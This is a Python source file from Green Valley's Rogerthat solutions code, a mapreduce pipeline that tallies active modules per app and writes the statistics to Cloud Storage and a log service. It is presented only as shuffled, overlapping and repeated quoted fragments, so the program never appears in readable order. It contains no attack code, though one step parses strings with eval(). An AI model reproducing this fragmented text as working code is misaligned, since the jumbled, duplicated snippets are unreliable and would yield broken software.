"'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10 } output = yield",
"1 return combined def combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]])",
"logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self, output): for filename in",
"ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path,",
"combined[module] = count else: combined[module] += count for v in new_values: # mapper",
"run(self, bucket_name, key, current_date): # type: (str, str, long) -> GeneratorType params =",
"get_server_settings from rogerthat.utils import guid, log_offload def start_job(): current_date = datetime.datetime.now() key =",
"not in combined: combined[module] = count else: combined[module] += count for v in",
"def run(self, bucket_name, key, current_date): # type: (str, str, long) -> GeneratorType params",
"ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _,",
"+= count for v in new_values: # mapper returns a string modules =",
"software # distributed under the License is distributed on an \"AS IS\" BASIS,",
"type: (SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values,",
"key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s', key,",
"# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to",
"} output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline):",
"def run(self, output, current_date): results = [] for filename in output: results.append((yield ProcessFilePipeline(filename)))",
"combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG:",
"%s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self, output): for filename in output:",
"= 1 else: combined[module] += 1 return combined def combiner(key, new_values, previously_combined_values): #",
"% (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url def",
"GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type:",
"coding: utf-8 -*- # Copyright 2020 Green Valley Belgium NV # # Licensed",
"under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES",
"get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for service_identity in",
"the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law",
"start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET,",
"{ 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG",
"output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename):",
"get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) ->",
"(str, list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer values: %s', values) combined =",
"= d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self,",
"STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils",
"\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express",
"count for v in new_values: # mapper returns a string modules = eval(v)",
"= yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output)",
"{} with cloudstorage.open(filename, \"r\") as f: for json_line in f: d = json.loads(json_line)",
"as f: for json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if",
"else: combined[module] += 1 return combined def combiner(key, new_values, previously_combined_values): # type: (str,",
"from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings import",
"and # limitations under the License. # # @@license_version:1.7@@ import datetime import json",
"DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils import",
"@@license_version:1.7@@ import datetime import json import logging import time import cloudstorage from mapreduce",
"required by applicable law or agreed to in writing, software # distributed under",
"type: (str, str, long) -> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': {",
"self, _suppress=False) return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date):",
"int]]) -> GeneratorType if DEBUG: logging.info('reducer values: %s', values) combined = _combine([], values)",
"import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings from",
"# @@license_version:1.7@@ import datetime import json import logging import time import cloudstorage from",
"applicable law or agreed to in writing, software # distributed under the License",
"key, current_date): # type: (str, str, long) -> GeneratorType params = { 'mapper_spec':",
"bucket_name, key, current_date): # type: (str, str, long) -> GeneratorType params = {",
"new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner",
"return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url)",
"or agreed to in writing, software # distributed under the License is distributed",
"if self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return logging.info('%s was finished', self) class",
"f: for json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG:",
"rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings",
"-> GeneratorType if DEBUG: logging.info('reducer values: %s', values) combined = _combine([], values) json_line",
"CONDITIONS OF ANY KIND, either express or implied. # See the License for",
"for module in modules: if module not in combined: combined[module] = 1 else:",
"ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {} with cloudstorage.open(filename, \"r\") as f: for",
"Belgium NV # # Licensed under the Apache License, Version 2.0 (the \"License\");",
"_suppress=False) return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results",
"(current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url",
"basestring) else v for module in modules: if module not in combined: combined[module]",
"yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return logging.info('%s",
"{ 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params':",
"pipeline import pipeline from pipeline.common import List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET",
"under the Apache License, Version 2.0 (the \"License\"); # you may not use",
"'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True)",
"writing, software # distributed under the License is distributed on an \"AS IS\"",
"= json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class",
"'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter',",
"DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def",
"current_date): results = [] for filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def",
"import datetime import json import logging import time import cloudstorage from mapreduce import",
"= counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url:",
"You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #",
"yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) -> dict[str,",
"app_id, json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date):",
"License. # You may obtain a copy of the License at # #",
"'%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): # type: (str,",
"from rogerthat.dal.service import get_service_identities from rogerthat.settings import get_server_settings from rogerthat.utils import guid, log_offload",
"process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted:",
"compliance with the License. # You may obtain a copy of the License",
"finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp = self.args #",
"list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer values: %s', values) combined = _combine([],",
"'%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url",
"(SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values):",
"list of dicts with key app_id, value dict of module, amount outputs =",
"task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline",
"aborted', self, _suppress=False) return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output,",
"results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value)",
"finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results = [] for filename",
"in combined: combined[module] = 1 else: combined[module] += 1 return combined def combiner(key,",
"of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable",
"ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): # type: (str, str, long) -> GeneratorType",
"language governing permissions and # limitations under the License. # # @@license_version:1.7@@ import",
"self.args # list of dicts with key app_id, value dict of module, amount",
"= {} with cloudstorage.open(filename, \"r\") as f: for json_line in f: d =",
"import cloudstorage from mapreduce import mapreduce_pipeline from pipeline import pipeline from pipeline.common import",
"returns a string modules = eval(v) if isinstance(v, basestring) else v for module",
"= json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield",
"logging.error('%s was aborted', self, _suppress=False) return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def",
"def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id,",
"logging import time import cloudstorage from mapreduce import mapreduce_pipeline from pipeline import pipeline",
"stats_per_app = {} with cloudstorage.open(filename, \"r\") as f: for json_line in f: d",
"task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return",
"combined def reducer(app_id, values): # type: (str, list[dict[str, int]]) -> GeneratorType if DEBUG:",
"not use this file except in compliance with the License. # You may",
"logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results = []",
"datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task",
"module, amount outputs = self.outputs.default.value # type: list[dict[int, int]] for output in outputs:",
"in new_values: # mapper returns a string modules = eval(v) if isinstance(v, basestring)",
"for json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline:",
"if module not in combined: combined[module] = 1 else: combined[module] += 1 return",
"-*- coding: utf-8 -*- # Copyright 2020 Green Valley Belgium NV # #",
"str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) -> dict[str, int] combined",
"modules = eval(v) if isinstance(v, basestring) else v for module in modules: if",
"[] for filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG:",
"pipeline from pipeline.common import List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service",
"License, Version 2.0 (the \"License\"); # you may not use this file except",
"# # @@license_version:1.7@@ import datetime import json import logging import time import cloudstorage",
"yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): # type:",
"module not in combined: combined[module] = 1 else: combined[module] += 1 return combined",
"from pipeline import pipeline from pipeline.common import List from rogerthat.consts import STATS_QUEUE, DEBUG,",
"outputs = self.outputs.default.value # type: list[dict[int, int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules',",
"= yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s",
"distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY",
"= _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s', key, combined) yield combined",
"int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner %s",
"from rogerthat.settings import get_server_settings from rogerthat.utils import guid, log_offload def start_job(): current_date =",
"time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats",
"for v in new_values: # mapper returns a string modules = eval(v) if",
"json import logging import time import cloudstorage from mapreduce import mapreduce_pipeline from pipeline",
"previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s', key, combined) yield combined def reducer(app_id,",
"list[dict[str, int]]) -> dict[str, int] combined = {} for stats in previous_combined_values: for",
"filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value",
"if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp = self.args # list",
"for output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self,",
"int]]) -> dict[str, int] combined = {} for stats in previous_combined_values: for module,",
"current_date): # type: (str, str, long) -> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper',",
"return combined def combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]]) ->",
"int] combined = {} for stats in previous_combined_values: for module, count in stats.iteritems():",
"# you may not use this file except in compliance with the License.",
"from pipeline.common import List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import",
"a string modules = eval(v) if isinstance(v, basestring) else v for module in",
"agreed to in writing, software # distributed under the License is distributed on",
"amount outputs = self.outputs.default.value # type: list[dict[int, int]] for output in outputs: log_offload.create_log(None,",
"service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str,",
"-> dict[str, int] combined = {} for stats in previous_combined_values: for module, count",
"(the \"License\"); # you may not use this file except in compliance with",
"self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results = [] for filename in",
"limitations under the License. # # @@license_version:1.7@@ import datetime import json import logging",
"= count else: combined[module] += count for v in new_values: # mapper returns",
"# Unless required by applicable law or agreed to in writing, software #",
"values: %s', values) combined = _combine([], values) json_line = json.dumps({'app_id': app_id, 'stats': combined})",
"by applicable law or agreed to in writing, software # distributed under the",
"DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp = self.args # list of",
"= self.outputs.default.value # type: list[dict[int, int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules', output,",
"<filename>src/solutions/common/job/module_statistics.py # -*- coding: utf-8 -*- # Copyright 2020 Green Valley Belgium NV",
"service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) -> dict[str, int]",
"copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by",
"GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values: %s',",
"'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name':",
"%s new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values) combined =",
"%s', self.outputs.default.value) _, timestamp = self.args # list of dicts with key app_id,",
"%s', key, combined) yield combined def reducer(app_id, values): # type: (str, list[dict[str, int]])",
"reducer(app_id, values): # type: (str, list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer values:",
"pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return",
"the License. # # @@license_version:1.7@@ import datetime import json import logging import time",
"Copyright 2020 Green Valley Belgium NV # # Licensed under the Apache License,",
"log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {}",
"file except in compliance with the License. # You may obtain a copy",
"count in stats.iteritems(): if module not in combined: combined[module] = count else: combined[module]",
"'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': {",
"counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): #",
"}, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10 } output",
"List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from rogerthat.settings",
"guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url =",
"if DEBUG: logging.debug('combiner %s combined: %s', key, combined) yield combined def reducer(app_id, values):",
"stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self, output): for filename in output: cloudstorage.delete(filename)",
"filename): stats_per_app = {} with cloudstorage.open(filename, \"r\") as f: for json_line in f:",
"License for the specific language governing permissions and # limitations under the License.",
"-> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings',",
"to in writing, software # distributed under the License is distributed on an",
"'shards': 2 if DEBUG else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline",
"= [] for filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if",
"implied. # See the License for the specific language governing permissions and #",
"previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s', key, combined)",
"\"License\"); # you may not use this file except in compliance with the",
"obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless",
"'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key,",
"pipeline.common import List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities",
"DEBUG: logging.debug('combiner %s combined: %s', key, combined) yield combined def reducer(app_id, values): #",
"%s: %s', app_id, json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name,",
"finalized(self): if self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return logging.info('%s was finished', self)",
"dicts with key app_id, value dict of module, amount outputs = self.outputs.default.value #",
"for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): # type: (list[list[str]],",
"}, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name } },",
"or implied. # See the License for the specific language governing permissions and",
"-> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield service_identity.app_id, str(sln_settings.modules) def _combine(new_values, previous_combined_values): #",
"combined[module] += count for v in new_values: # mapper returns a string modules",
"'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name } }, 'input_reader_spec':",
"key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task =",
"# type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s new_values:",
"Apache License, Version 2.0 (the \"License\"); # you may not use this file",
"app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n' %",
"OR CONDITIONS OF ANY KIND, either express or implied. # See the License",
"may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #",
"json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n'",
"output, current_date): results = [] for filename in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results)",
"with cloudstorage.open(filename, \"r\") as f: for json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']]",
"rogerthat.settings import get_server_settings from rogerthat.utils import guid, log_offload def start_job(): current_date = datetime.datetime.now()",
"http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,",
"in writing, software # distributed under the License is distributed on an \"AS",
"yield combined def reducer(app_id, values): # type: (str, list[dict[str, int]]) -> GeneratorType if",
"if DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline):",
"in previous_combined_values: for module, count in stats.iteritems(): if module not in combined: combined[module]",
"logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self,",
"bucket_name } }, 'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader', 'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter', 'shards': 2 if DEBUG else 10",
"combined[module] += 1 return combined def combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]],",
"# See the License for the specific language governing permissions and # limitations",
"the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR",
"current_date = datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key,",
"counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE) redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s',",
"% (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key, return_task=True) task.add(queue_name=STATS_QUEUE)",
"bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer':",
"import mapreduce_pipeline from pipeline import pipeline from pipeline.common import List from rogerthat.consts import",
"from mapreduce import mapreduce_pipeline from pipeline import pipeline from pipeline.common import List from",
"app_id, value dict of module, amount outputs = self.outputs.default.value # type: list[dict[int, int]]",
"log_offload def start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter",
"stats in previous_combined_values: for module, count in stats.iteritems(): if module not in combined:",
"isinstance(v, basestring) else v for module in modules: if module not in combined:",
"values): # type: (str, list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer values: %s',",
"mapper returns a string modules = eval(v) if isinstance(v, basestring) else v for",
"was aborted', self, _suppress=False) return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self,",
"# limitations under the License. # # @@license_version:1.7@@ import datetime import json import",
"if module not in combined: combined[module] = count else: combined[module] += count for",
"[] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner', 'reducer_spec': 'solutions.common.job.module_statistics.reducer', 'reducer_params': { 'output_writer': { 'bucket_name': bucket_name }",
"cloudstorage from mapreduce import mapreduce_pipeline from pipeline import pipeline from pipeline.common import List",
"json_line in f: d = json.loads(json_line) stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s',",
"the Apache License, Version 2.0 (the \"License\"); # you may not use this",
"pipeline url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type: (SolutionSettings)",
"list[dict[int, int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline):",
"you may not use this file except in compliance with the License. #",
"previous_combined_values): # type: (list[list[str]], list[dict[str, int]]) -> dict[str, int] combined = {} for",
"%s', values) combined = _combine([], values) json_line = json.dumps({'app_id': app_id, 'stats': combined}) if",
"Green Valley Belgium NV # # Licensed under the Apache License, Version 2.0",
"v in new_values: # mapper returns a string modules = eval(v) if isinstance(v,",
"return logging.info('%s was finished', self) class ProcessOutputPipeline(pipeline.Pipeline): def run(self, output, current_date): results =",
"'oca.active_modules', output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {} with",
"combined def combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType",
"specific language governing permissions and # limitations under the License. # # @@license_version:1.7@@",
"under the License. # # @@license_version:1.7@@ import datetime import json import logging import",
"mapreduce import mapreduce_pipeline from pipeline import pipeline from pipeline.common import List from rogerthat.consts",
"mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self):",
"json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): # type: (str, str, long)",
"long) -> GeneratorType params = { 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind':",
"use this file except in compliance with the License. # You may obtain",
"in combined: combined[module] = count else: combined[module] += count for v in new_values:",
"values) combined = _combine([], values) json_line = json.dumps({'app_id': app_id, 'stats': combined}) if DEBUG:",
"= '%s/status?root=%s' % (counter.base_path, counter.pipeline_id) logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl +",
"# type: list[dict[int, int]] for output in outputs: log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp)",
"with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was aborted', self, _suppress=False)",
"= 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple())) task = counter.start(idempotence_key=key,",
"2 if DEBUG else 10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline =",
"= datetime.datetime.now() key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid()) counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple()))",
"# mapper returns a string modules = eval(v) if isinstance(v, basestring) else v",
"ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was aborted',",
